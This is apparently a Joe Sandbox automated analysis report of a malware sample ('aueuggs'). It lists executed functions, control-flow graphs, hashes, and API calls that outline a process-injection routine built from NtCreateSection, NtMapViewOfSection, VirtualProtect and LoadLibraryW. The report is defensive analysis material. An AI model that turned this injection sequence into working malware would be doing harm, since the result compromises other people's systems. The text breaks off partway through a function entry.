40a6f8 7804 40a710 _wcslen 7803->7804 7808 40a708 7803->7808 7809 40ae93 7804->7809 7806 40ae93 __calloc_crt RtlAllocateHeap 7807 40a734 _wcslen __NMSG_WRITE 7806->7807 7807->7806 7807->7808 7811 40ae9c 7809->7811 7812 40aed9 7811->7812 7813 40dae2 7811->7813 7812->7807 7814 40daee __calloc_crt 7813->7814 7815 40db1c RtlAllocateHeap 7814->7815 7816 40dafa 7814->7816 7815->7814 7815->7816 7816->7811 7817 40a3f8 HeapCreate 7921 25cb0e6 7922 25cb0f7 7921->7922 7923 25cb897 3 API calls 7922->7923 7924 25cb10f 7923->7924

                                                                      Executed Functions

                                                                      Function 004012AB Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 392COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 4012ab-4012b2 1 4012c3 0->1 2 4012b9-4012da 0->2 1->2 7 4012ee 2->7 8 4012df-4012ea 2->8 7->8 9 4012f1-40138a call 401186 7->9 8->9 16 401408 9->16 17 40138c 9->17 20 40140b-401411 16->20 18 401404 17->18 19 40138e-40139c 17->19 18->16 21 401415 18->21 22 4013fa-401403 19->22 23 40139e-40143e 19->23 24 401418-40143c 20->24 21->20 21->24 22->18 27 40143f-40145b call 401186 23->27 24->27 34 4013f2-4013f8 27->34 35 40145d-401481 27->35 36 4014a0-4014a3 35->36 37 401483-401487 35->37 39 401502-401553 call 401186 36->39 40 4014a5-4014b4 36->40 37->36 38 401489-40148e 37->38 38->36 42 401491-40149f 38->42 57 401555 39->57 58 401558-40155d 39->58 45 4014b6-4014b8 40->45 42->36 45->45 46 4014ba-4014ce 45->46 48 4014d0-4014d2 46->48 49 4014ea-4014f1 46->49 57->58 60 401563-401574 58->60 61 401878-401880 58->61 64 401876-401897 60->64 65 40157a-4015a3 60->65 61->58 72 4018a6 64->72 73 40189d-4018c6 call 401186 64->73 65->64 74 4015a9-4015c0 NtDuplicateObject 65->74 72->73 74->64 75 4015c6-4015ea NtCreateSection 74->75 77 401646-40166c NtCreateSection 75->77 78 4015ec-40160d NtMapViewOfSection 75->78 77->64 80 401672-401676 77->80 78->77 81 40160f-40162b NtMapViewOfSection 78->81 80->64 83 40167c-40169d NtMapViewOfSection 80->83 81->77 84 40162d-401643 81->84 83->64 86 4016a3-4016bf NtMapViewOfSection 83->86 84->77 86->64 89 4016c5 call 4016ca 86->89
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: O$u
                                                                      • API String ID: 0-1426094074
                                                                      • Opcode ID: fc28355d1bd9b55e96d57c391207adfdeb1b039e1bb682a9e10912c63c4cda28
                                                                      • Instruction ID: 6c0fdc4d84967332c471f3e59838abf2ed393e8be5ddaf11b6e9a247f6d6b291
                                                                      • Opcode Fuzzy Hash: fc28355d1bd9b55e96d57c391207adfdeb1b039e1bb682a9e10912c63c4cda28
                                                                      • Instruction Fuzzy Hash: F5D12571904245EBDB219F55CC44EAB7BB8FF82714F24417BE952BA1F1D2388602CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004014F4 Relevance: 10.7, APIs: 7, Instructions: 181nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 92 4014f4-401553 call 401186 104 401555 92->104 105 401558-40155d 92->105 104->105 107 401563-401574 105->107 108 401878-401880 105->108 111 401876-401897 107->111 112 40157a-4015a3 107->112 108->105 119 4018a6 111->119 120 40189d-4018c6 call 401186 111->120 112->111 121 4015a9-4015c0 NtDuplicateObject 112->121 119->120 121->111 122 4015c6-4015ea NtCreateSection 121->122 124 401646-40166c NtCreateSection 122->124 125 4015ec-40160d NtMapViewOfSection 122->125 124->111 127 401672-401676 124->127 125->124 128 40160f-40162b NtMapViewOfSection 125->128 127->111 130 40167c-40169d NtMapViewOfSection 127->130 128->124 131 40162d-401643 128->131 130->111 133 4016a3-4016bf NtMapViewOfSection 130->133 131->124 133->111 136 4016c5 call 4016ca 133->136
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 718cf7cf2070750d6a03261995fd349e41501109dfa1350d1f46578160f340bf
                                                                      • Instruction ID: 17c8b5c6b7d03a249af4a1ce3f33b6d11283f5bd133b62a523f5e2d8a45d1619
                                                                      • Opcode Fuzzy Hash: 718cf7cf2070750d6a03261995fd349e41501109dfa1350d1f46578160f340bf
                                                                      • Instruction Fuzzy Hash: 0D512D71900205BFEB209F91CC48FEF7BB8EF85B00F104129F912BA2E5E6749941CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401501 Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 139 401501-401553 call 401186 146 401555 139->146 147 401558-40155d 139->147 146->147 149 401563-401574 147->149 150 401878-401880 147->150 153 401876-401897 149->153 154 40157a-4015a3 149->154 150->147 161 4018a6 153->161 162 40189d-4018c6 call 401186 153->162 154->153 163 4015a9-4015c0 NtDuplicateObject 154->163 161->162 163->153 164 4015c6-4015ea NtCreateSection 163->164 166 401646-40166c NtCreateSection 164->166 167 4015ec-40160d NtMapViewOfSection 164->167 166->153 169 401672-401676 166->169 167->166 170 40160f-40162b NtMapViewOfSection 167->170 169->153 172 40167c-40169d NtMapViewOfSection 169->172 170->166 173 40162d-401643 170->173 172->153 175 4016a3-4016bf NtMapViewOfSection 172->175 173->166 175->153 178 4016c5 call 4016ca 175->178
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 9984b560c3149dd7a735e47dd78e2cd68fd0edf502ba838df985c043765e37bb
                                                                      • Instruction ID: 6f0604b32057d325caf3f51fa446859acea35a512505d6c4cf197e41671a197c
                                                                      • Opcode Fuzzy Hash: 9984b560c3149dd7a735e47dd78e2cd68fd0edf502ba838df985c043765e37bb
                                                                      • Instruction Fuzzy Hash: 8C512BB1900249BFEF209F92CC48FEFBBB8EF85700F144159F911AA2E5E6759941CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401528 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 181 401528-401553 call 401186 185 401555 181->185 186 401558-40155d 181->186 185->186 188 401563-401574 186->188 189 401878-401880 186->189 192 401876-401897 188->192 193 40157a-4015a3 188->193 189->186 200 4018a6 192->200 201 40189d-4018c6 call 401186 192->201 193->192 202 4015a9-4015c0 NtDuplicateObject 193->202 200->201 202->192 203 4015c6-4015ea NtCreateSection 202->203 205 401646-40166c NtCreateSection 203->205 206 4015ec-40160d NtMapViewOfSection 203->206 205->192 208 401672-401676 205->208 206->205 209 40160f-40162b NtMapViewOfSection 206->209 208->192 211 40167c-40169d NtMapViewOfSection 208->211 209->205 212 40162d-401643 209->212 211->192 214 4016a3-4016bf NtMapViewOfSection 211->214 212->205 214->192 217 4016c5 call 4016ca 214->217
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 2f760a7a6e5d1e8f12fab574b919c9d6b8d73b05a2dd249efc9c4677c5b04d32
                                                                      • Instruction ID: af98140ee9de545a9c2869d3359d5e8b3b7d0483e67685bb764150cfa9c8d530
                                                                      • Opcode Fuzzy Hash: 2f760a7a6e5d1e8f12fab574b919c9d6b8d73b05a2dd249efc9c4677c5b04d32
                                                                      • Instruction Fuzzy Hash: 6E510871900259BFEB209F92CC48FEFBBB8EF85B10F144159F911AA2A5E7719940CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040153C Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 220 40153c-401553 call 401186 226 401555 220->226 227 401558-40155d 220->227 226->227 229 401563-401574 227->229 230 401878-401880 227->230 233 401876-401897 229->233 234 40157a-4015a3 229->234 230->227 241 4018a6 233->241 242 40189d-4018c6 call 401186 233->242 234->233 243 4015a9-4015c0 NtDuplicateObject 234->243 241->242 243->233 244 4015c6-4015ea NtCreateSection 243->244 246 401646-40166c NtCreateSection 244->246 247 4015ec-40160d NtMapViewOfSection 244->247 246->233 249 401672-401676 246->249 247->246 250 40160f-40162b NtMapViewOfSection 247->250 249->233 252 40167c-40169d NtMapViewOfSection 249->252 250->246 253 40162d-401643 250->253 252->233 255 4016a3-4016bf NtMapViewOfSection 252->255 253->246 255->233 258 4016c5 call 4016ca 255->258
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 3809ac319917b6d3bab6ba358ca8ba8e52c3928ac3e1657726bd27ab975abf26
                                                                      • Instruction ID: bcfd12d57f681495948eb5138da1c6a4081ea1a5ed11d5619747b33be395d59e
                                                                      • Opcode Fuzzy Hash: 3809ac319917b6d3bab6ba358ca8ba8e52c3928ac3e1657726bd27ab975abf26
                                                                      • Instruction Fuzzy Hash: 8C510A71900245BFEB209F92CC48FEFBBB8EF85750F104159F911BA1A5E6749941CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 025CB897 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 400 25cb897-25cb8b0 401 25cb8b2-25cb8b4 400->401 402 25cb8bb-25cb8c7 CreateToolhelp32Snapshot 401->402 403 25cb8b6 401->403 404 25cb8c9-25cb8cf 402->404 405 25cb8d7-25cb8e4 Module32First 402->405 403->402 404->405 410 25cb8d1-25cb8d5 404->410 406 25cb8ed-25cb8f5 405->406 407 25cb8e6-25cb8e7 call 25cb556 405->407 411 25cb8ec 407->411 410->401 410->405 411->406
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 025CB8BF
                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 025CB8DF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.951037651.00000000025C6000.00000040.00000020.00020000.00000000.sdmp, Offset: 025C6000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_25c6000_aueuggs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 3833638111-0
                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                      • Instruction ID: e5662af26112998f976a7b176dfdd49a07aa8b3284867c6e3a014a08a070e0d0
                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                      • Instruction Fuzzy Hash: DBF096351007116FE7203BF99C8EF6E7AE8BF49639F20052DE646910C0EBB4E8454B65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00423C30 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 501memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 261 423c30-423c6a call 40e960 264 423c70-423c76 261->264 265 423c78-423c7c 264->265 266 423c7e-423c84 264->266 265->266 267 423c86-423c8e 266->267 268 423c9a-423ca1 266->268 267->268 271 423c90-423c98 267->271 268->264 269 423ca3-423cad 268->269 272 423cb3-423d13 269->272 273 423da6-423dba 269->273 271->268 271->269 317 423d16-423d1b 272->317 274 423dc0-423dc6 273->274 276 423dd3-423dda 274->276 277 423dc8-423dcd 274->277 278 423df2-423df9 276->278 279 423ddc-423def 276->279 277->276 278->274 280 423dfb-423e17 LocalAlloc 278->280 279->278 282 423e90-423e93 280->282 283 423e19-423e2b 280->283 286 423f60-423f78 282->286 287 423e99-423f5b 282->287 285 423e30-423e35 283->285 290 423e37-423e4f 285->290 291 423e59-423e66 call 4239b0 285->291 292 423f80-423f83 286->292 287->286 290->291 306 423e8b-423e8e 291->306 307 423e68-423e86 291->307 293 423fb3-423fb8 292->293 294 423f85-423fae 292->294 299 42411b-42411f 293->299 300 423fbe-424116 293->300 294->293 299->292 302 424125-42413c 299->302 300->299 308 424140-424153 302->308 306->282 306->285 307->306 335 424155-42415b 308->335 317->317 318 423d1d-423d24 317->318 321 423d30-423d33 318->321 322 423d26 318->322 326 423d43-423d45 321->326 327 423d35-423d41 321->327 322->321 329 423d52-423d5c 326->329 330 423d47-423d4b 326->330 334 423d50 327->334 336 423d5e-423d66 329->336 337 423d8d-423d91 329->337 330->334 334->329 341 424160-42416a 335->341 342 423d68 336->342 343 423d6c-423d83 call 40b520 336->343 338 423d93-423d9d 337->338 339 423da0 337->339 338->339 339->273 345 424170-424171 341->345 346 42416c 341->346 342->343 352 423d85 343->352 353 423d89 343->353 345->341 350 424173-4241a2 VirtualProtect call 423be0 345->350 346->345 358 4241a7-4241ad 350->358 352->353 353->337 360 4241af-4241b8 358->360 361 4241bc-4241c2 358->361 360->361 363 4241c4 call 423990 361->363 364 4241c9-4241d0 361->364 363->364 364->358 367 4241d2-424256 LoadLibraryW 364->367 369 4242ec-424303 367->369 370 42425c-4242e4 367->370 370->369
                                                                      APIs
                                                                      • LocalAlloc.KERNELBASE(00000000,022826CC,?,?,?,?,?,?,00426666,000000FF), ref: 00423E03
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950652655.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00409000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_409000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: AllocLocal
                                                                      • String ID: t^:
                                                                      • API String ID: 3494564517-1317908726
                                                                      • Opcode ID: c062c4851d68092e18220f5942159808537afa80d0018a64bd420801c80f2341
                                                                      • Instruction ID: 4d636d28f844f565b3d530f3d341ce37d985ee3deda23cb04abb92f0731eb413
                                                                      • Opcode Fuzzy Hash: c062c4851d68092e18220f5942159808537afa80d0018a64bd420801c80f2341
                                                                      • Instruction Fuzzy Hash: A402DB71644340ABE320EF90ED49F5B77B8EB84B01F50452EF785AB1E0DBB49944CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040DAE2 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 413 40dae2-40daec 414 40db09-40db12 413->414 415 40daee-40daf8 413->415 416 40db14 414->416 417 40db15-40db1a 414->417 415->414 418 40dafa-40db08 415->418 416->417 419 40db1c-40db2d RtlAllocateHeap 417->419 420 40db2f-40db36 417->420 419->420 421 40db61-40db63 419->421 422 40db54-40db59 420->422 423 40db38-40db41 call 40910e 420->423 422->421 426 40db5b 422->426 423->417 428 40db43-40db48 423->428 426->421 429 40db50-40db52 428->429 430 40db4a 428->430 429->421 430->429
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0040AEA9,?,?,00000000), ref: 0040DB25
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950652655.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00409000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_409000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 1ab4e90e3bf2085b5c19cb3079ae7fb3a0f3e77fe013268dfdebb13dc2d63100
                                                                      • Instruction ID: 89ae16cb865302e8bc47b642ae2bc1fc27565457d2be399f30c09226411e951d
                                                                      • Opcode Fuzzy Hash: 1ab4e90e3bf2085b5c19cb3079ae7fb3a0f3e77fe013268dfdebb13dc2d63100
                                                                      • Instruction Fuzzy Hash: 2401B135B002159AEB289FA5DC04B6737B4EB857A4F06453AA915AB2D0D73CE814CA98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040A9D8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 431 40a9d8-40a9e7 433 40a9e9-40a9ec 431->433 434 40a9ed-40a9f0 431->434 435 40aa02-40aa0a call 40ae4e 434->435 436 40a9f2-40a9f8 434->436 439 40aa0f-40aa14 435->439 436->436 437 40a9fa-40aa00 436->437 437->435 437->436 440 40aa23-40aa2e call 40b520 439->440 441 40aa16-40aa22 439->441 440->441
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950652655.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00409000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_409000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: __malloc_crt
                                                                      • String ID:
                                                                      • API String ID: 3464615804-0
                                                                      • Opcode ID: 1ac1e0c22a827e4eb3afa572b7ce0305a9c31c80a6fabd8f886b3d2083b26de1
                                                                      • Instruction ID: 6c009c41319a7d8d7d2ff0ff75bb1fb8a32a163ed955803d9688be5ede57aee7
                                                                      • Opcode Fuzzy Hash: 1ac1e0c22a827e4eb3afa572b7ce0305a9c31c80a6fabd8f886b3d2083b26de1
                                                                      • Instruction Fuzzy Hash: 4AF0E9777012106ACB306734BC498975668DAD632430B8437F401E32C0F6388D91C7AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040A3F8 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 445 40a3f8-40a415 HeapCreate
                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040A401
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950652655.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00409000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_409000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHeap
                                                                      • String ID:
                                                                      • API String ID: 10892065-0
                                                                      • Opcode ID: 49a7b99272e7dfb1a34acc57a7128d62bad4503410a37b1f68c0455ac866e0bf
                                                                      • Instruction ID: 7b2594a50018b71bddf63201193a1d411e4c34ecc50922a49ca2bed2e99e9dfa
                                                                      • Opcode Fuzzy Hash: 49a7b99272e7dfb1a34acc57a7128d62bad4503410a37b1f68c0455ac866e0bf
                                                                      • Instruction Fuzzy Hash: A6C092B47953426BE7588B39AD26B8929E49B0DB43F204079B307ED9E0DAB195609F08
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018C9 Relevance: 1.3, APIs: 1, Instructions: 64sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 446 4018c9-40192e call 401186 Sleep call 4013fb 460 401930-401938 call 4014f4 446->460 461 40193d-401986 call 401186 446->461 460->461
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                        • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                        • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                      • String ID:
                                                                      • API String ID: 4152845823-0
                                                                      • Opcode ID: 53c9cd3384d2906c802fe6f3e3e31b8b704e5f86a1bc45d71cf18f0f00b039c7
                                                                      • Instruction ID: e62ef0a5377d8aa3a211eebfa9e1192b8d220afb4109f2d02ab252a4e2d2aae2
                                                                      • Opcode Fuzzy Hash: 53c9cd3384d2906c802fe6f3e3e31b8b704e5f86a1bc45d71cf18f0f00b039c7
                                                                      • Instruction Fuzzy Hash: CA118EB220C305FADB006A949C91EBA36689B11714F308137BB53790F1A57C9653F76F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018E5 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 475 4018e5-40192e call 401186 Sleep call 4013fb 489 401930-401938 call 4014f4 475->489 490 40193d-401986 call 401186 475->490 489->490
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                        • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                        • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                      • String ID:
                                                                      • API String ID: 4152845823-0
                                                                      • Opcode ID: 4ed9d038ad82778c0538dd9e301f09955b0ecda2ba93e19649321b1be2ae3255
                                                                      • Instruction ID: 05c04d2ad09f16b9b87c287c864bc9b7ec61e89fae5dcaecab9d0654b7c4e063
                                                                      • Opcode Fuzzy Hash: 4ed9d038ad82778c0538dd9e301f09955b0ecda2ba93e19649321b1be2ae3255
                                                                      • Instruction Fuzzy Hash: BB015BB220C305EADB006A949D62EB932649B15715F308137BA53790F1957C8653F61B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018D4 Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 504 4018d4-40192e call 401186 Sleep call 4013fb 516 401930-401938 call 4014f4 504->516 517 40193d-401986 call 401186 504->517 516->517
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                        • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                        • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.950648234.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_aueuggs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                      • String ID:
                                                                      • API String ID: 4152845823-0
                                                                      • Opcode ID: 6bef9fa10c94b4d929980f6de66e1a6c4508e267192d79ae07afb604da632a6a
                                                                      • Instruction ID: fce81954366252da7adbbdf3d64cc03e59f8ef64e68a90b3f3f5323062df9ebf
                                                                      • Opcode Fuzzy Hash: 6bef9fa10c94b4d929980f6de66e1a6c4508e267192d79ae07afb604da632a6a
                                                                      • Instruction Fuzzy Hash: FF016DB220C305EADB006A949C61EAA37645B51715F348137BA53B90F1D57C8653F62B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004018F4 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
